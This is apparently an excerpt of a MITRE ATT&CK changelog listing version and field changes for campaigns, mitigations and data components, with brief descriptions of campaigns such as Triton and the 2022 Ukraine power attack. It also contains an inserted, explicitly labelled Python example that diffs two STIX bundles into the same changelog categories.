modified | 2022-09-30 21:05:22.490000+00:00 | 2024-04-11 00:30:42.003000+00:00
x_mitre_attack_spec_version | 3.0.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[C0006] Operation Honeybee

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-13 17:57:06.034000+00:00 | 2024-04-11 00:30:09.195000+00:00
x_mitre_attack_spec_version | 3.0.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[C0005] Operation Spalax

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-13 13:06:44.395000+00:00 | 2024-04-11 00:29:32.199000+00:00
x_mitre_attack_spec_version | 3.0.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

mobile-attack

New Campaigns

[C0033] C0033

Current version: 1.0

Description: [C0033](https://attack.mitre.org/campaigns/C0033) was a [PROMETHIUM](https://attack.mitre.org/groups/G0056) campaign during which they used [StrongPity](https://attack.mitre.org/software/S0491) to target Android users. [C0033](https://attack.mitre.org/campaigns/C0033) was the first publicly documented mobile campaign for [PROMETHIUM](https://attack.mitre.org/groups/G0056), who previously used Windows-based techniques.(Citation: welivesec_strongpity)

Minor Version Changes

[C0016] Operation Dust Storm

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-09-30 21:05:22.490000+00:00 | 2024-04-11 00:30:42.003000+00:00
x_mitre_attack_spec_version | 3.0.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

ics-attack

New Campaigns

[C0034] 2022 Ukraine Electric Power Attack

Current version: 1.0

Description: The [2022 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0034) was a [Sandworm Team](https://attack.mitre.org/groups/G0034) campaign that used a combination of GOGETTER, Neo-REGEORG, [CaddyWiper](https://attack.mitre.org/software/S0693), and living off the land (LotL) techniques to gain access to a Ukrainian electric utility and send unauthorized commands from its SCADA system.(Citation: Mandiant-Sandworm-Ukraine-2022)(Citation: Dragos-Sandworm-Ukraine-2022)


[C0030] Triton Safety Instrumented System Attack

Current version: 1.0

Description: [Triton Safety Instrumented System Attack](https://attack.mitre.org/campaigns/C0030) was a campaign employed by [TEMP.Veles](https://attack.mitre.org/groups/G0088) which leveraged the [Triton](https://attack.mitre.org/software/S1009) malware framework against a petrochemical organization.(Citation: Triton-EENews-2017) The malware and techniques used within this campaign targeted specific Triconex [Safety Controller](https://attack.mitre.org/assets/A0010)s within the environment.(Citation: FireEye TRITON 2018) The incident was eventually discovered due to a safety trip that occurred as a result of an issue in the malware.(Citation: FireEye TRITON 2017)


[C0031] Unitronics Defacement Campaign

Current version: 1.0

Description: The [Unitronics Defacement Campaign](https://attack.mitre.org/campaigns/C0031) was a collection of intrusions across multiple sectors by the [CyberAv3ngers](https://attack.mitre.org/groups/G1027), in which the threat actors engaged in seemingly opportunistic, global targeting and defacement of Unitronics Vision Series [Programmable Logic Controller (PLC)](https://attack.mitre.org/assets/A0003) devices with an integrated [Human-Machine Interface (HMI)](https://attack.mitre.org/assets/A0002). These PLCs are commonly found in the water and wastewater, energy, food and beverage manufacturing, and healthcare sectors. The most notable feature of this attack was the defacement of the PLCs' HMIs.(Citation: CISA AA23-335A IRGC-Affiliated December 2023)(Citation: Frank Bajak and Marc Levy December 2023)

Mitigations

enterprise-attack

Minor Version Changes

[M1054] Software Configuration

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field                  | Old value                        | New Value
x_mitre_attack_spec_version |                                  | 3.2.0
x_mitre_deprecated          |                                  | False
values_changed
STIX Field                  | Old value                        | New Value
modified                    | 2020-03-31 13:11:09.471000+00:00 | 2023-12-26 19:17:13.293000+00:00
x_mitre_version             | 1.1                              | 1.2
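The dictionary_item_added and values_changed tables throughout this changelog are field-level diffs of the STIX objects in two ATT&CK bundle snapshots. The following is an added example, not the ATT&CK project's own changelog tooling, of how to produce records in that same shape from two bundles and sort each object into the page's buckets (new, major or minor version change, deprecated). The "patches" bucket for objects whose fields changed without a version bump is an assumption about how such objects should be grouped. The two miniature bundles are constructed inline: the M1054 Software Configuration field values are copied from the table above, while the STIX ids and the C0033 timestamp are placeholders.

```python
"""Diff two ATT&CK STIX bundle snapshots into changelog-style records.

Added example, not ATT&CK's own code. Assumes STIX 2.x bundles where each
object carries an external_references entry with source_name "mitre-attack".
"""
import json
from typing import Any, Dict, List, Optional, Tuple

MITRE = "mitre-attack"

# Constructed miniature bundles. M1054 field values match the table above
# (v1.1 -> v1.2); STIX ids and the C0033 timestamp are placeholders.
OLD_BUNDLE: Dict[str, Any] = {
    "type": "bundle",
    "objects": [
        {
            "type": "course-of-action",
            "id": "course-of-action--placeholder-m1054",
            "name": "Software Configuration",
            "modified": "2020-03-31T13:11:09.471Z",
            "x_mitre_version": "1.1",
            "external_references": [{"source_name": MITRE, "external_id": "M1054"}],
        }
    ],
}
NEW_BUNDLE: Dict[str, Any] = {
    "type": "bundle",
    "objects": [
        {
            "type": "course-of-action",
            "id": "course-of-action--placeholder-m1054",
            "name": "Software Configuration",
            "modified": "2023-12-26T19:17:13.293Z",
            "x_mitre_version": "1.2",
            "x_mitre_attack_spec_version": "3.2.0",
            "x_mitre_deprecated": False,
            "external_references": [{"source_name": MITRE, "external_id": "M1054"}],
        },
        {
            "type": "campaign",
            "id": "campaign--placeholder-c0033",
            "name": "C0033",
            "modified": "2024-04-11T00:00:00.000Z",  # placeholder timestamp
            "x_mitre_version": "1.0",
            "external_references": [{"source_name": MITRE, "external_id": "C0033"}],
        },
    ],
}


def attack_id(obj: Dict[str, Any]) -> Optional[str]:
    """Return the ATT&CK id (e.g. M1054) from the object's external references."""
    for ref in obj.get("external_references", []):
        if ref.get("source_name") == MITRE:
            return ref.get("external_id")
    return None


def version_tuple(v: str) -> Tuple[int, ...]:
    return tuple(int(part) for part in v.split("."))


def bump_kind(old_v: str, new_v: str) -> str:
    """'major' if the leading component grew, 'minor' for any other bump, 'patch' if equal."""
    o, n = version_tuple(old_v), version_tuple(new_v)
    if n == o:
        return "patch"
    return "major" if n[0] > o[0] else "minor"


def diff_objects(old: Dict[str, Any], new: Dict[str, Any]) -> Dict[str, Any]:
    """Field-level diff in the same shape the changelog tables use."""
    added = {k: new[k] for k in new if k not in old}
    removed = {k: old[k] for k in old if k not in new}
    changed = {k: (old[k], new[k]) for k in old if k in new and old[k] != new[k]}
    return {"dictionary_item_added": added, "dictionary_item_removed": removed,
            "values_changed": changed}


def diff_bundles(old_bundle: Dict[str, Any], new_bundle: Dict[str, Any]) -> Dict[str, List[Dict[str, Any]]]:
    """Bucket every object: new, major, minor, patches (assumed bucket), deprecated, removed."""
    old = {o["id"]: o for o in old_bundle["objects"]}
    new = {o["id"]: o for o in new_bundle["objects"]}
    report: Dict[str, List[Dict[str, Any]]] = {
        "new": [], "major": [], "minor": [], "patches": [], "deprecated": [], "removed": []}
    bucket_for = {"major": "major", "minor": "minor", "patch": "patches"}
    for sid, obj in new.items():
        entry: Dict[str, Any] = {"attack_id": attack_id(obj), "name": obj.get("name"),
                                 "version": obj.get("x_mitre_version")}
        if sid not in old:
            report["new"].append(entry)
            continue
        delta = diff_objects(old[sid], obj)
        if not any(delta.values()):
            continue  # byte-for-byte identical object; nothing to report
        entry.update(delta)
        if obj.get("x_mitre_deprecated") and not old[sid].get("x_mitre_deprecated"):
            report["deprecated"].append(entry)
            continue
        kind = bump_kind(old[sid].get("x_mitre_version", "0.0"), obj.get("x_mitre_version", "0.0"))
        report[bucket_for[kind]].append(entry)
    for sid, obj in old.items():
        if sid not in new:
            report["removed"].append({"attack_id": attack_id(obj), "name": obj.get("name")})
    return report


if __name__ == "__main__":
    print(json.dumps(diff_bundles(OLD_BUNDLE, NEW_BUNDLE), indent=2, default=str))
```

Run against the two real bundles (for example the enterprise-attack JSON of two ATT&CK releases loaded with json.load), the "minor" bucket yields the same field triples shown in the tables on this page; object identity is keyed on the STIX id, not the name, so renamed objects still match.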

mobile-attack

New Mitigations

[M1059] Do Not Mitigate

Current version: 1.0

Description: This category groups techniques for which attempting a mitigation might increase the risk of compromise; mitigation is therefore not recommended for them.

Data Components

mobile-attack

New Data Components

Application Vetting: Application Assets

Current version: 1.0

Description: Additional assets included with an application